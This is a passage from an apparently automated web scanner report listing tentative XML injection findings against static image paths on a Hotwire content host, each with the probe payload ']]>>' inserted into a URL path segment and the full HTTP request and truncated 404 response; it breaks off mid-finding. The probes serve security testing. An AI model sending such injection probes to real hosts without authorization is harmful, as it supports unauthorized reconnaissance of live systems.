Path:   /static/images/hotel/details/img-opaque-price-lockup-bg-new-large_cap.png

Issue detail

The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/hotel/details/img-opaque-price-lockup-bg-new-large_cap.png]]>>?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Expires: Mon, 03 Oct 2011 01:02:11 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 03 Oct 2011 01:02:11 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.147. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-retail-tabs-on.png [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/img-retail-tabs-on.png

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static]]>>/images/hotel/details/img-retail-tabs-on.png?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:23 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.148. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-retail-tabs-on.png [REST URL parameter 2]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/img-retail-tabs-on.png

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images]]>>/hotel/details/img-retail-tabs-on.png?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:27 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.149. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-retail-tabs-on.png [REST URL parameter 3]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/img-retail-tabs-on.png

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/hotel]]>>/details/img-retail-tabs-on.png?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:31 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.150. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-retail-tabs-on.png [REST URL parameter 4]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/img-retail-tabs-on.png

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/hotel/details]]>>/img-retail-tabs-on.png?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:35 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.151. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-retail-tabs-on.png [REST URL parameter 5]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/img-retail-tabs-on.png

Issue detail

The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/hotel/details/img-retail-tabs-on.png]]>>?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Expires: Mon, 03 Oct 2011 01:02:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 03 Oct 2011 01:02:38 GMT
Content-Length: 1422
Connection: close
Vary: Accept-Encoding

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.152. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-top-curved-corners.png [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/img-top-curved-corners.png

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static]]>>/images/hotel/details/img-top-curved-corners.png?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:01:57 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.153. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-top-curved-corners.png [REST URL parameter 2]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/img-top-curved-corners.png

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images]]>>/hotel/details/img-top-curved-corners.png?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535995
Date: Mon, 03 Oct 2011 01:02:00 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.154. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-top-curved-corners.png [REST URL parameter 3]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/img-top-curved-corners.png

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/hotel]]>>/details/img-top-curved-corners.png?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:05 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.155. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-top-curved-corners.png [REST URL parameter 4]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/img-top-curved-corners.png

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/hotel/details]]>>/img-top-curved-corners.png?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535944
Date: Mon, 03 Oct 2011 01:02:10 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.156. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-top-curved-corners.png [REST URL parameter 5]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/img-top-curved-corners.png

Issue detail

The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/hotel/details/img-top-curved-corners.png]]>>?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Expires: Mon, 03 Oct 2011 01:02:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 03 Oct 2011 01:02:15 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.157. http://ak-static.hotwirestatic.com/static/images/hotel/details/imgReviewsBox_Bkgd.gif [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/imgReviewsBox_Bkgd.gif

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static]]>>/images/hotel/details/imgReviewsBox_Bkgd.gif?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:22 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.158. http://ak-static.hotwirestatic.com/static/images/hotel/details/imgReviewsBox_Bkgd.gif [REST URL parameter 2]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/imgReviewsBox_Bkgd.gif

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images]]>>/hotel/details/imgReviewsBox_Bkgd.gif?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:26 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.159. http://ak-static.hotwirestatic.com/static/images/hotel/details/imgReviewsBox_Bkgd.gif [REST URL parameter 3]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/imgReviewsBox_Bkgd.gif

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/hotel]]>>/details/imgReviewsBox_Bkgd.gif?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:30 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.160. http://ak-static.hotwirestatic.com/static/images/hotel/details/imgReviewsBox_Bkgd.gif [REST URL parameter 4]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/imgReviewsBox_Bkgd.gif

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/hotel/details]]>>/imgReviewsBox_Bkgd.gif?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:33 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.161. http://ak-static.hotwirestatic.com/static/images/hotel/details/imgReviewsBox_Bkgd.gif [REST URL parameter 5]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/imgReviewsBox_Bkgd.gif

Issue detail

The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/hotel/details/imgReviewsBox_Bkgd.gif]]>>?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Expires: Mon, 03 Oct 2011 01:02:36 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 03 Oct 2011 01:02:36 GMT
Content-Length: 1422
Connection: close
Vary: Accept-Encoding

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.162. http://ak-static.hotwirestatic.com/static/images/hotel/details/imgReviewsBox_Bottom.gif [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/imgReviewsBox_Bottom.gif

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static]]>>/images/hotel/details/imgReviewsBox_Bottom.gif?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:23 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.163. http://ak-static.hotwirestatic.com/static/images/hotel/details/imgReviewsBox_Bottom.gif [REST URL parameter 2]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
